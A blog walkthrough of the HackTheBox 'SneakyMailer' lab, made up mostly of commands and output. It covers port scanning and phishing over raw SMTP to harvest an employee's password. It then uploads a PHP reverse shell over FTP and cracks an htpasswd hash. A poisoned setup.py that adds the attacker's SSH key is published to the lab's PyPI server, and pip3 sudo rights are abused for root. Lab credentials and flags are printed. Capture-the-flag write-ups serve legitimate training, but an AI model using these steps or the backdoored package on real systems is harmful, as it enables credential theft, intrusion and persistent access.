SNEAKYMAILER HACKTHEBOX WRITEUP

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 09:29 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 09:29
    Completed NSE at 09:29, 0.00s elapsed
    Initiating NSE at 09:29
    Completed NSE at 09:29, 0.00s elapsed
    Initiating NSE at 09:29
    Completed NSE at 09:29, 0.00s elapsed
    Initiating Ping Scan at 09:29
    Scanning 10.10.10.197 [4 ports]
    Completed Ping Scan at 09:29, 0.34s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 09:29
    Scanning dev.sneakycorp.htb (10.10.10.197) [1000 ports]
    Discovered open port 25/tcp on 10.10.10.197
    Discovered open port 80/tcp on 10.10.10.197
    Discovered open port 22/tcp on 10.10.10.197
    Discovered open port 21/tcp on 10.10.10.197
    Discovered open port 993/tcp on 10.10.10.197
    Discovered open port 143/tcp on 10.10.10.197
    Discovered open port 8080/tcp on 10.10.10.197
    Completed SYN Stealth Scan at 09:29, 11.04s elapsed (1000 total ports)
    Initiating Service scan at 09:29
    Scanning 7 services on dev.sneakycorp.htb (10.10.10.197)
    Completed Service scan at 09:29, 11.81s elapsed (7 services on 1 host)
    Initiating OS detection (try #1) against dev.sneakycorp.htb (10.10.10.197)
    Retrying OS detection (try #2) against dev.sneakycorp.htb (10.10.10.197)
    Retrying OS detection (try #3) against dev.sneakycorp.htb (10.10.10.197)
    Retrying OS detection (try #4) against dev.sneakycorp.htb (10.10.10.197)
    Retrying OS detection (try #5) against dev.sneakycorp.htb (10.10.10.197)
    Initiating Traceroute at 09:30
    Completed Traceroute at 09:30, 0.32s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 09:30
    Completed Parallel DNS resolution of 2 hosts. at 09:30, 0.57s elapsed
    NSE: Script scanning 10.10.10.197.
    Initiating NSE at 09:30
    Completed NSE at 09:30, 19.73s elapsed
    Initiating NSE at 09:30
    Completed NSE at 09:30, 31.01s elapsed
    Initiating NSE at 09:30
    Completed NSE at 09:30, 0.00s elapsed
    Nmap scan report for dev.sneakycorp.htb (10.10.10.197)
    Host is up (0.66s latency).
    Not shown: 993 closed ports
    PORT     STATE SERVICE  VERSION
    21/tcp   open  ftp      vsftpd 3.0.3
    22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
    |   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
    |_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
    25/tcp   open  smtp     Postfix smtpd
    |_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
    80/tcp   open  http     nginx 1.14.2
    | http-methods: 
    |_  Supported Methods: GET HEAD POST
    |_http-server-header: nginx/1.14.2
    |_http-title: Employee - Dashboard
    143/tcp  open  imap     Courier Imapd (released 2018)
    |_imap-capabilities: completed CAPABILITY IDLE NAMESPACE ACL THREAD=REFERENCES QUOTA CHILDREN UTF8=ACCEPTA0001 IMAP4rev1 ENABLE OK ACL2=UNION STARTTLS THREAD=ORDEREDSUBJECT SORT UIDPLUS
    | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Subject Alternative Name: email:postmaster@example.com
    | Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Public Key type: rsa
    | Public Key bits: 3072
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-05-14T17:14:21
    | Not valid after:  2021-05-14T17:14:21
    | MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
    |_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
    |_ssl-date: TLS randomness does not represent time
    993/tcp  open  ssl/imap Courier Imapd (released 2018)
    | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Subject Alternative Name: email:postmaster@example.com
    | Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Public Key type: rsa
    | Public Key bits: 3072
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-05-14T17:14:21
    | Not valid after:  2021-05-14T17:14:21
    | MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
    |_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
    |_ssl-date: TLS randomness does not represent time
    8080/tcp open  http     nginx 1.14.2
    | http-methods: 
    |_  Supported Methods: GET HEAD
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-server-header: nginx/1.14.2
    |_http-title: Welcome to nginx!
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.80%E=4%D=7/13%OT=21%CT=1%CU=36468%PV=Y%DS=2%DC=T%G=Y%TM=5F0BDC7
    OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS
    OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
    OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
    OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)

    Uptime guess: 7.778 days (since Sun Jul  5 14:50:01 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=259 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 8888/tcp)
    HOP RTT       ADDRESS
    1   322.24 ms 10.10.14.1
    2   322.25 ms dev.sneakycorp.htb (10.10.10.197)

    NSE: Script Post-scanning.
    Initiating NSE at 09:30
    Completed NSE at 09:30, 0.00s elapsed
    Initiating NSE at 09:30
    Completed NSE at 09:30, 0.00s elapsed
    Initiating NSE at 09:30
    Completed NSE at 09:30, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 108.42 seconds
            Raw packets sent: 1619 (75.262KB) | Rcvd: 1163 (50.101KB)

ENUMERATION

Here We have Emails So we will make wordlist using CEWL and store it in a txt file.

EMAILS WORDLISTS :

    airisatou@sneakymailer.htb
    angelicaramos@sneakymailer.htb
    ashtoncox@sneakymailer.htb
    bradleygreer@sneakymailer.htb
    brendenwagner@sneakymailer.htb
    briellewilliamson@sneakymailer.htb
    brunonash@sneakymailer.htb
    caesarvance@sneakymailer.htb
    carastevens@sneakymailer.htb
    cedrickelly@sneakymailer.htb
    chardemarshall@sneakymailer.htb
    colleenhurst@sneakymailer.htb
    dairios@sneakymailer.htb
    donnasnider@sneakymailer.htb
    doriswilder@sneakymailer.htb
    finncamacho@sneakymailer.htb
    fionagreen@sneakymailer.htb
    garrettwinters@sneakymailer.htb
    gavincortez@sneakymailer.htb
    gavinjoyce@sneakymailer.htb
    glorialittle@sneakymailer.htb
    haleykennedy@sneakymailer.htb
    hermionebutler@sneakymailer.htb
    herrodchandler@sneakymailer.htb
    hopefuentes@sneakymailer.htb
    howardhatfield@sneakymailer.htb
    jacksonbradshaw@sneakymailer.htb
    jenagaines@sneakymailer.htb
    jenettecaldwell@sneakymailer.htb
    jenniferacosta@sneakymailer.htb
    jenniferchang@sneakymailer.htb
    jonasalexander@sneakymailer.htb
    laelgreer@sneakymailer.htb
    martenamccray@sneakymailer.htb
    michaelsilva@sneakymailer.htb
    michellehouse@sneakymailer.htb
    olivialiang@sneakymailer.htb
    paulbyrd@sneakymailer.htb
    prescottbartlett@sneakymailer.htb
    quinnflynn@sneakymailer.htb
    rhonadavidson@sneakymailer.htb
    sakurayamamoto@sneakymailer.htb
    sergebaldwin@sneakymailer.htb
    shaddecker@sneakymailer.htb
    shouitou@sneakymailer.htb
    sonyafrost@sneakymailer.htb
    sukiburks@sneakymailer.htb
    sulcud@sneakymailer.htb
    tatyanafitzpatrick@sneakymailer.htb
    thorwalton@sneakymailer.htb
    tigernixon@sneakymailer.htb
    timothymooney@sneakymailer.htb
    unitybutler@sneakymailer.htb
    vivianharrell@sneakymailer.htb
    yuriberry@sneakymailer.htb
    zenaidafrank@sneakymailer.htb
    zoritaserrano@sneakymailer.htb

For refrence you can use IPPSEC’S CHAOS VIDEO Here we need valid EMAILS for this So we will be sending mails from unknown emails to these one by one Which after a while we will get valid email like this with password!

SENDING MAIL :

    ┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #telnet 10.10.10.197 25
    Trying 10.10.10.197...
    Connected to 10.10.10.197.
    Escape character is '^]'.
    MAIL FROM: liquid@sna220 debian ESMTP Postfix (Debian/GNU)
        
    501 5.1.7 Bad sender address syntax
    MAIL FROM: liquid@sneakymailer.htb
    250 2.1.0 Ok
    MAIL TO: paulbyrd@sneakymailer.htb
    503 5.5.1 Error: nested MAIL command
    RCPT TO: paulbyrd@sneakymailer.htb
    250 2.1.5 Ok
    DATA
    h354 End data with <CR><LF>.<CR><LF>
    http://10.10.15.56/
    .
    250 2.0.0 Ok: queued as 23A9424686

RESPONSE BACK ON PORT 80 :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #nc -lnvp 80
    listening on [any] 80 ...
    connect to [10.10.15.56] from (UNKNOWN) [10.10.10.197] 53704
    POST /%0D HTTP/1.1
    Host: 10.10.15.56
    User-Agent: python-requests/2.23.0
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: keep-alive
    Content-Length: 185
    Content-Type: application/x-www-form-urlencoded

    firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt^C

paulbyrd@sneakymailer.htb : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

Now we will be using evolution to get all mails from this email :

So here we have another password for developer username :

developer : m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

For evolution part you can check ippsec’s chaos video

FTP LOGINS :

    ┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #ftp 10.10.10.197
    Connected to 10.10.10.197.
    220 (vsFTPd 3.0.3)
    Name (10.10.10.197:root): developer
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxrwxr-x    8 0        1001         4096 Jun 30 01:15 dev
    226 Directory send OK.
    ftp> cd dev
    250 Directory successfully changed.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxr-xr-x    2 0        0            4096 May 26 19:52 css
    drwxr-xr-x    2 0        0            4096 May 26 19:52 img
    -rwxr-xr-x    1 0        0           13742 Jun 23 09:44 index.php
    drwxr-xr-x    3 0        0            4096 May 26 19:52 js
    drwxr-xr-x    2 0        0            4096 May 26 19:52 pypi
    drwxr-xr-x    4 0        0            4096 May 26 19:52 scss
    -rwxr-xr-x    1 0        0           26523 May 26 20:58 team.php
    drwxr-xr-x    8 0        0            4096 May 26 19:52 vendor
    226 Directory send OK.
    ftp> 

SUBDOMAIN ENUMERATION :

┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.sneakycorp.htb" --hc 301 --hw 356 -t 100 10.10.10.197

    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    ********************************************************

    Target: http://10.10.10.197/
    Total requests: 207643

    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                               
    ===================================================================

    000000007:   400        7 L      12 W     173 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"     
    000000009:   400        7 L      12 W     173 Ch      "# Suite 300, San Francisco, California, 94105, USA."                 
    000000810:   200        340 L    989 W    13737 Ch    "dev"   

Here we have another webpage with subdomain and having same pages on website which we can access through FTP. So here we will just upload shell in FTP and will trigger it from website dev.sneakycorp.htb

UPLOAD SHELL IN DEV DIRECTORY :

ftp> put register.php 
    local: register.php remote: register.php
    200 PORT command successful. Consider using PASV.
    150 Ok to send data.
    226 Transfer complete.
    5492 bytes sent in 0.01 secs (441.7859 kB/s)
    ftp> 

TRIGGER SHELL FROM WEBSITE :

RESPONSE WHICH YOU WILL GET :

┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #nc -lnvp 1234
    listening on [any] 1234 ...
    connect to [10.10.15.56] from (UNKNOWN) [10.10.10.197] 48488
    Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
    00:41:17 up 4 min,  0 users,  load average: 0.17, 0.21, 0.10
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ 

GETTING USER ACCESS

    $ bash -i
    bash: cannot set terminal process group (685): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@sneakymailer:/$ su developer
    su developer
    Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
    bash: cannot set terminal process group (685): Inappropriate ioctl for device
    bash: no job control in this shell
    developer@sneakymailer:/$ cd
    developer@sneakymailer:~$ id
    uid=1001(developer) gid=1001(developer) groups=1001(developer)
    developer@sneakymailer:~$ cd ../
    developer@sneakymailer:/var/www$ ls
    dev.sneakycorp.htb
    html
    pypi.sneakycorp.htb
    sneakycorp.htb
    developer@sneakymailer:/var/www$ cd pypi.sneakycorp.htb
    cd pypi.sneakycorp.htb
    developer@sneakymailer:/var/www/pypi.sneakycorp.htb$ ls -la
    ls -la
    total 20
    drwxr-xr-x 4 root root     4096 May 15 14:29 .
    drwxr-xr-x 6 root root     4096 May 14 18:25 ..
    -rw-r--r-- 1 root root       43 May 15 14:29 .htpasswd
    drwxrwx--- 2 root pypi-pkg 4096 Jun 30 02:24 packages
    drwxr-xr-x 6 root pypi     4096 May 14 18:25 venv
    developer@sneakymailer:/var/www/pypi.sneakycorp.htb$ cat .htpasswd
    cat .htpasswd
    pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Here we got another domain which we will be adding into /etc/hosts And a password which we will be cracking in our machine
So after cracking we got something like this:

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #hashcat -m 1600 -a 0 pypihash ../../THM/Wordlists/rockyou.txt  --force
    hashcat (v5.1.0) starting...

    OpenCL Platform #1: The pocl project
    ====================================
    * Device #1: pthread-Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz, 2048/5898 MB allocatable, 8MCU

    $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui
                                                    
    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
    Hash.Target......: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
    Time.Started.....: Mon Jul 13 10:17:57 2020 (3 mins, 10 secs)
    Time.Estimated...: Mon Jul 13 10:21:07 2020 (0 secs)
    Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:    19026 H/s (9.30ms) @ Accel:256 Loops:125 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 3614720/14344384 (25.20%)
    Rejected.........: 0/3614720 (0.00%)
    Restore.Point....: 3612672/14344384 (25.19%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
    Candidates.#1....: soulmeets1 -> sotoares

    Started: Mon Jul 13 10:17:32 2020
    Stopped: Mon Jul 13 10:21:08 2020

Also our pypi.sneakycorp.htb looks like this

So here we can conclude that we can install packages in machine. So what we will be doing is we will be installing them manually so that we could place our script in place of actual package.

REFRENCES :

https://pypi.org/project/pypiserver/#upload-with-setuptools

https://www.activestate.com/resources/quick-reads/how-to-manually-install-python-packages/#:~:text=Installing%20Python%20Packages%20with%20Setup,Enter%3A%20python%20setup.py%20install

After channging minor parts in script it will look like

SETUP.PY :


    import setuptools
    try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChNgxk5jtpjV+hYI+KmW503AaJHeNk11nN14+YNuJ18yXmZn2sqME2DWirrHLpEyYvPeROs0tPBK+K3ZqL8SHierZZHY2FmLIlfAcDzN/mOjZzA3+cXX6iGgOo67nlhaiyisxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxJYw+svdLWT4ihbb/LWCeF+Kjam8bXgb8= root@liquid")
        f.close()
    except Exception as e:
    pass
    setuptools.setup(
    name="example-pkg3", # Replace with your own username
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
    "Programming Language :: Python :: 3",
    "License :: OSI Approved :: MIT License",
    "Operating System :: OS Independent",
    ],
    )

PYPIRC :

    [distutils]
    index-servers = local

    [local]
    repository: http://pypi.sneakycorp.htb:8080
    username: pypi
    password: soufianeelhaoui

Just upload both of them in TMP diretory in any folder and run this command :

python3 setup.py sdist register -r local upload -r local

    developer@sneakymailer:/$ cd /tmp
    cd /tmp
    ldeveloper@sneakymailer:/tmp$ s
    ls
    systemd-private-2c8ab75d46924481ac84f56b75c9a067-systemd-timesyncd.service-a5Ynvb
    vmware-root_458-834774610
    developer@sneakymailer:/tmp$ mkdir liquid
    mkdir liquid
    cd developer@sneakymailer:/tmp$ liquid
    cd liquid
    developer@sneakymailer:/tmp/liquid$ HOME=$(pwd)
    HOME=$(pwd)
    developer@sneakymailer:~$ pwd 
    /tmp/liquid
    pwd
    developer@sneakymailer:~$ wget http://10.10.15.56/setup.py
    wget http://10.10.15.56/setup.py
    --2020-07-13 01:06:52--  http://10.10.15.56/setup.py
    Connecting to 10.10.15.56:80... connected.
    HTTP request sent, awaiting response... w200 OK
    Length: 1193 (1.2K) [text/plain]
    Saving to: ‘setup.py’

        0K .                                                     100% 1.94M=0.001s

    2020-07-13 01:06:53 (1.94 MB/s) - ‘setup.py’ saved [1193/1193]

    developer@sneakymailer:~$wget http://10.10.15.56/.pypirc
    wget http://10.10.15.56/.pypirc
    --2020-07-13 01:07:05--  http://10.10.15.56/.pypirc
    Connecting to 10.10.15.56:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 128 [application/octet-stream]
    Saving to: ‘.pypirc’

        0K                                                       100% 19.6M=0s

    2020-07-13 01:07:07 (19.6 MB/s) - ‘.pypirc’ saved [128/128]

    developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
    <n3 setup.py sdist register -r local upload -r local
    running sdist
    running egg_info
    creating example_pkg3.egg-info
    writing example_pkg3.egg-info/PKG-INFO
    writing dependency_links to example_pkg3.egg-info/dependency_links.txt
    writing top-level names to example_pkg3.egg-info/top_level.txt
    writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
    reading manifest file 'example_pkg3.egg-info/SOURCES.txt'
    writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
    warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md

    running check
    creating example-pkg3-0.0.1
    creating example-pkg3-0.0.1/example_pkg3.egg-info
    copying files to example-pkg3-0.0.1...
    copying setup.py -> example-pkg3-0.0.1
    copying example_pkg3.egg-info/PKG-INFO -> example-pkg3-0.0.1/example_pkg3.egg-info
    copying example_pkg3.egg-info/SOURCES.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
    copying example_pkg3.egg-info/dependency_links.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
    copying example_pkg3.egg-info/top_level.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
    Writing example-pkg3-0.0.1/setup.cfg
    creating dist
    Creating tar archive
    removing 'example-pkg3-0.0.1' (and everything under it)
    running register
    Registering example-pkg3 to http://pypi.sneakycorp.htb:8080
    Server response (200): OK
    WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
    running upload
    Submitting dist/example-pkg3-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
    Server response (200): OK
    WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
    developer@sneakymailer:~$ 
~~~

<br>
Here we will just <kbd>SSH</kbd> into ther machine:
<br>

~~~ruby
    ┌─[root@liquid]─[~/Desktop/HTB/sneakymailer/pip]
    └──╼ #ssh -i id_rsa low@10.10.10.197
    Enter passphrase for key 'id_rsa': 
    Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    No mail.
    Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105
    low@sneakymailer:~$ id
    uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
    low@sneakymailer:~$ cat user.txt
    49438ae21c8095ddd5abe9b1608a266c
    low@sneakymailer:~$ 

GETTING ROOT ACCESS

    low@sneakymailer:~$ sudo -l

    sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
    Matching Defaults entries for low on sneakymailer:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User low may run the following commands on sneakymailer:
        (root) NOPASSWD: /usr/bin/pip3
    low@sneakymailer:~$ 
    low@sneakymailer:~$ TF=$(mktemp -d)
    low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
    low@sneakymailer:~$ sudo pip3 install $TF
    sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
    Processing /tmp/tmp.qRgHUXIOL0
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # cd /root
    # cat root.txt
    d6b1290eeecc5a53d4fcf94fa26d00c0

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: